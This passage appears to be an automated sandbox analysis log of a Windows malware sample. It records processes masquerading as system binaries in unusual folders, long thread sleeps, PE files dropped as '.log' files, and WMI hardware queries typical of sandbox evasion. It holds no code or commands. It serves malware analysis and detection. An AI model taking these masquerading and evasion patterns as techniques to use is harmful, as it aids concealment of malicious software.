                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1410000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: C40000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: 1140000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 7B0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 26E0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A6E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 970000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 1A400000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeFile opened / queried: C:\Users\user\AppData\Local\Temp\a0w4buVmCi
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 600000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599797
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599219
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 3600000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598844
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598344
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597797
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597547
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597375
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596344
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596031
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595779
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595546
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595250
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594953
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594594
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 593781
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 593422
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 593078
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 592578
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 592297
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 591156
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 590828
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 590438
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 590125
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 589609
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 588547
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 588156
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 587844
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 587422
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 587078
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 586609
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 300000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 585734
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 585484
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 585172
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 584734
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 584328
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 583896
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 583422
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 583078
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582840
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582594
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582465
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582336
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582187
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582068
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581938
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581781
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581656
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581494
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581321
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581203
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581068
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580938
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580828
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580715
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580547
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580421
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580282
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580124
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579885
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579739
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579609
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579476
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579359
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579250
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579139
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579017
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578891
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578741
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578605
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578440
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578322
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578219
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578098
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577955
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577813
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577578
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577016
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576887
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576772
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576648
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576513
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576314
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576176
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2492Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2177Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2730Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2627
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2458
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2519
                              Source: C:\Recovery\RuntimeBroker.exeWindow / User API: threadDelayed 9343
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDropped PE file which has not been started: C:\Users\user\Desktop\kZSUvzow.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDropped PE file which has not been started: C:\Users\user\Desktop\vNwKfKje.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\vlWcZFKy.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\SlQgWXuB.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDropped PE file which has not been started: C:\Users\user\Desktop\vEZKvYQi.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\pkWDNnmN.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\WgRxdDkv.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDropped PE file which has not been started: C:\Users\user\Desktop\mjoVvRUx.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\CjKcCUFn.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDropped PE file which has not been started: C:\Users\user\Desktop\UAuXMqPf.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\cZuWGjpj.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDropped PE file which has not been started: C:\Users\user\Desktop\XIsgiJJb.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe TID: 7440Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 2492 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 2177 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 2730 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 2627 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep count: 2458 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 2519 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe TID: 8536Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\ModemLogs\conhost.exe TID: 8768Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\ModemLogs\conhost.exe TID: 8544Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8920Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8492Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe TID: 8452Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe TID: 8772Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\xKVBpkhCEjg.exe TID: 8552Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\xKVBpkhCEjg.exe TID: 8548Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 5780Thread sleep time: -30000s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -14757395258967632s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -600000s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -599797s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -599219s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8576Thread sleep time: -3600000s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -598844s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -598344s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -597797s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -597547s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -597375s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -596344s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -596031s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -595779s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -595546s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -595250s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -594953s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -594594s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -593781s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -593422s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -593078s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -592578s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -592297s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -591156s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -590828s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -590438s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -590125s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -589609s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -588547s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -588156s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -587844s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -587422s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -587078s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -586609s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8576Thread sleep time: -600000s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -585734s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -585484s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -585172s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -584734s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -584328s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -583896s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -583422s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -583078s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -582840s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -582594s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -582465s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -582336s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -582187s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -582068s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581938s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581781s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581656s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581494s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581321s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581203s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -581068s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580938s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580828s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580715s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580547s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580421s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580282s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580124s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -580000s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579885s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579739s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579609s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579476s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579359s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579250s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579139s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -579017s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578891s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578741s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578605s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578440s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578322s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578219s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -578098s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -577955s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -577813s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -577578s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -577016s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -576887s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -576772s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -576648s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -576513s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -576314s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8592Thread sleep time: -576176s >= -30000s
                              Source: C:\Recovery\RuntimeBroker.exe TID: 8260Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8680Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe TID: 9176Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ModemLogs\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ModemLogs\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\xKVBpkhCEjg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\xKVBpkhCEjg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
